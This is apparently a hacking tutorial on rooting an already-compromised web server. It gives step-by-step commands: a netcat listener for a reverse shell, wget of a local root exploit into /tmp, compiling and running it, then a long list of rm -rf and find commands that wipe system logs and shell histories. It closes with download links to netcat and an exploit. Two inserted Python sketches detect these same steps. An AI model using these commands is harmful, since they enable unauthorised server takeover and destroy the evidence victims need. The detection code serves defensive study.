Hi guys, today I will tell you how to root a server in a few easy steps.
Thanks to one of my friends, ALMAS MALIK aka Code smasher.
Things Required :
Netcat
Shelled site
Local root exploit
Step By Step Tutorial :
First go to Run & type cmd, then type :
cd C:\Program Files\Netcat
( Make sure that your Netcat is saved in that directory ) .
![[Image: 11.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9Ua5X1uAVN5ESE7RAWWQvDNODpNW0zlUt_OKYwyYmj9meupWueiTZMQhDqh217_efm8dFfLUzzaGbZjY0uAIjOzF2xmeNuDCrk4KjW3GN-OMX75srmm3CNO3_147o2qpbBDiXDCsXt3s/s1600/11.jpg)
Now type : nc -n -l -v -p 443 . The output should look like the image shown below .
![[Image: 12.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBfQ1pS72ClHT_hUeNktvR8D5JZwZ6DCbt0EylvKY2-lVahxiyos2u_NQrRqlgpQkugcD_HIjMhrLyROb2KbIHgKp_0u6jB81tvEnD9iUlp45WzC_3_09xxeka4WTSSiyfS3DhRusOG-Q/s1600/12.jpg)
It's time to open your shell & then connect using the back connect function in your shell ( make sure that you are not using any VPN or proxy ) . After the connection is established you will see something like the screenshot below .
![[Image: 13.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhh6BKNLUNL9rFwJnJ9fbC1KEDDF1jR1xDZP1zOk_qBvb7lvhIXNL5eq_huuH4kWAspYDyEdTss0pYNa9nXR1KcEgoUDfolgsPezOcApSmycBPTl36PDQuFrFMDH9Z4a04syEpXsYSpQms/s1600/13.jpg)
![[Image: CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p...127+AM.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3wDZ-1-_nnCbzJUCPod8iErtjbjZgVFytSkHhlOwp1X293pCkMVROPqlff6Zdu7MdjM4_1ctqZcHn1TPfunoR857ButxQcuPkyTxeeZKSaC0lzXvmQyTp08NTzBera2isnDE-mErJESw/s1600/CWINDOWSsystem32cmd.exe+-+nc+-n+-l+-v+-p+443+4202012+32127+AM.jpg)
So you have successfully connected. Now we have to get our local root exploit; mine, for example, is 2.6.18-374 2011 .
![[Image: 14.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2hDs3EwzITeLHZxjDQpD27ASz1grCyvWToaZhPcoQz-QalPZw_4abGl2Yzu9149SUiENj7uotepCcBihDfPf2MrVkaL6xlJ3fh_BvQBIrG-E88AgjsBKxiEpfD9OfMbY0mgkhbqDVApA/s1600/14.jpg)
In this step we have to upload our exploit to a writable folder. Instead of wasting time finding one, we can just change directory to the /tmp folder, which is a standard writable folder .
Type this command to change dir to /tmp :
cd /tmp
To upload your exploit we will use the wget function .
Type :
wget http://www.somesite.com/exploit.c
This will upload the exploit to the /tmp folder .
![[Image: 15.jpg]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguoLIsqq6s-kcrVXVuzXoJ0Yvgzhst4_nqn3AB9cd1NPNRFEvK3CFxs0I-gjhbUAcqWbMMpbaS6nAj0z1BRMqyLVMM_TxtaIDyd0oRAvn2URREgs64PH-AEKA_HpAY__4DU139p-z2Jks/s1600/15.jpg)
(Case 1) If you have uploaded your exploit as a .c file (exploit.c), then we have to compile it. To compile it, type the following command .
Type :
gcc exploit.c -o exploit
Keep in mind that in the above command exploit refers to the name of your exploit (exploit.c) . If it compiles properly with no errors & warnings then you can proceed; if you get an error, find another exploit.
(Case 2) If you have uploaded your exploit in a zip file, then you have to unzip it by typing the command below .
Type:
unzip exploit.zip
After we have done all the above steps correctly, it's time to set permissions, so we will type the following command
Type:
chmod 777 exploit
Now it's time to run the exploit. To run it we will type the following command
Type:
./exploit
Now the exploit will run & the server will be rooted ;) . To check whether we got root we can type
Type:
id or whoami
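Seen from the server's side, the steps above leave a recognisable trail: a web-server account fetching, compiling, chmod-ing and running a file under /tmp, followed by commands running as root in the same process tree. The detection sketch below is an added example, not part of the original post; the event fields (tree, user, cwd, cmd), the account names and the sample events are assumptions constructed for illustration.

```python
import shlex
from collections import defaultdict

SERVICE_USERS = {"www-data", "apache", "nginx"}   # assumed web-application accounts
STAGING_DIRS = ("/tmp", "/var/tmp", "/dev/shm")   # world-writable locations
STEP_BY_PROG = {"wget": "fetch", "curl": "fetch", "gcc": "compile",
                "cc": "compile", "chmod": "chmod"}

def under_staging(path):
    return any(path == d or path.startswith(d + "/") for d in STAGING_DIRS)

def stage_of(ev):
    """Tag one exec event with the step of the chain it matches, else None."""
    argv = shlex.split(ev["cmd"]) or [""]
    prog = argv[0].rsplit("/", 1)[-1]
    staged = under_staging(ev["cwd"])
    if staged and prog in STEP_BY_PROG:
        return STEP_BY_PROG[prog]
    # A program started from inside a staging directory, by relative or full path.
    if (staged and argv[0].startswith("./")) or under_staging(argv[0]):
        return "exec-from-staging"
    return None

def analyze(events):
    """Report process trees where a service account performs two or more chain
    steps, or where a tree started by a service account later runs as root."""
    trees = defaultdict(lambda: {"first_user": None, "stages": [], "root_after": False})
    for ev in events:
        tree = trees[ev["tree"]]
        tree["first_user"] = tree["first_user"] or ev["user"]
        if ev["user"] in SERVICE_USERS:
            stage = stage_of(ev)
            if stage and stage not in tree["stages"]:
                tree["stages"].append(stage)
        elif ev["user"] == "root" and tree["first_user"] in SERVICE_USERS:
            tree["root_after"] = True   # privilege change without su/sudo
    return {k: t for k, t in trees.items() if len(t["stages"]) >= 2 or t["root_after"]}

# Constructed sample events, not real logs. "tree" is an assumed process-tree id.
SAMPLE = [
    {"tree": 1, "user": "www-data", "cwd": "/tmp", "cmd": "wget http://www.somesite.com/exploit.c"},
    {"tree": 1, "user": "www-data", "cwd": "/tmp", "cmd": "gcc exploit.c -o exploit"},
    {"tree": 1, "user": "www-data", "cwd": "/tmp", "cmd": "chmod 777 exploit"},
    {"tree": 1, "user": "www-data", "cwd": "/tmp", "cmd": "./exploit"},
    {"tree": 1, "user": "root", "cwd": "/tmp", "cmd": "id"},
    {"tree": 2, "user": "www-data", "cwd": "/var/www/html", "cmd": "php cron.php"},
    {"tree": 3, "user": "deploy", "cwd": "/tmp", "cmd": "wget http://www.somesite.com/release.tar.gz"},
]

if __name__ == "__main__":
    print(analyze(SAMPLE))
```

Only tree 1 is reported: it shows all four staging steps and then a root command in a tree that began as www-data.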
Clearing Logs:
Now it's time to clear our tracks or logs. Below are some commands to delete the log files .
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} \;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
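Because the commands above destroy the local copies, a defender has to catch them in command or audit records that are shipped off the host as they are written. The classifier below is an added example, not part of the original post; it is built from the paths listed above, and the function names and sample command lines are constructed for illustration.

```python
import fnmatch
import shlex

# Paths taken from the commands listed above; anything at or below them counts.
PROTECTED = ("/var/log", "/var/logs", "/var/adm", "/var/run/utmp", "/etc/wtmp",
             "/etc/utmp", "/usr/local/apache/logs", "/usr/local/apache/log",
             "/var/apache/logs", "/var/apache/log", "/tmp/logs")
HISTORY_NAMES = (".bash_history", ".ksh_history", ".bash_logout")
# Names a find -name pattern is tested against to decide whether it sweeps up logs.
PROBE_NAMES = HISTORY_NAMES + ("auth.log", "logs", "log")

def is_protected(path):
    if path == "$HISTFILE" or path.rsplit("/", 1)[-1] in HISTORY_NAMES:
        return True
    return any(path == p or path.startswith(p + "/") for p in PROTECTED)

def tamper_reason(cmd):
    """Return why a command line looks like log or history destruction, else None."""
    argv = shlex.split(cmd) or [""]
    prog = argv[0].rsplit("/", 1)[-1]
    # "history" is a shell builtin, so it only shows up in shell-level command logging.
    if prog == "history" and "-c" in argv[1:]:
        return "shell history cleared"
    if prog == "rm":
        hits = [a for a in argv[1:] if not a.startswith("-") and is_protected(a)]
        return f"rm on protected path {hits[0]}" if hits else None
    deletes = "-delete" in argv or ("-exec" in argv and "rm" in argv)
    if prog == "find" and deletes and "-name" in argv[:-1]:
        pattern = argv[argv.index("-name") + 1]
        if any(fnmatch.fnmatchcase(n, pattern) for n in PROBE_NAMES):
            return f"find-and-delete sweep for {pattern}"
    return None

def scan(lines):
    """Return (command, reason) for every command line that is flagged."""
    return [(c, r) for c in lines if (r := tamper_reason(c))]

# Constructed sample command lines: six from the list above, two benign.
SAMPLE = [
    "rm -rf $HISTFILE",
    "rm -rf /root/.bash_history",
    "rm -rf /var/log",
    "history -c",
    r'find / -name "log*" -exec rm -rf {} \;',
    r"find / -name *.log -exec rm -rf {} \;",
    "rm -rf /tmp/build-cache",
    r'find /srv/app -name "*.pyc" -delete',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```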
Hope you all have enjoyed this tutorial. If you have any doubts, just mention them in a reply !
Use this hack wisely :)
And the download links :
Netcat : http://www.downloadnetcat.com/nc11nt.zip
Local root exploit : http://pastebin.com/download.php?i=6eUFD2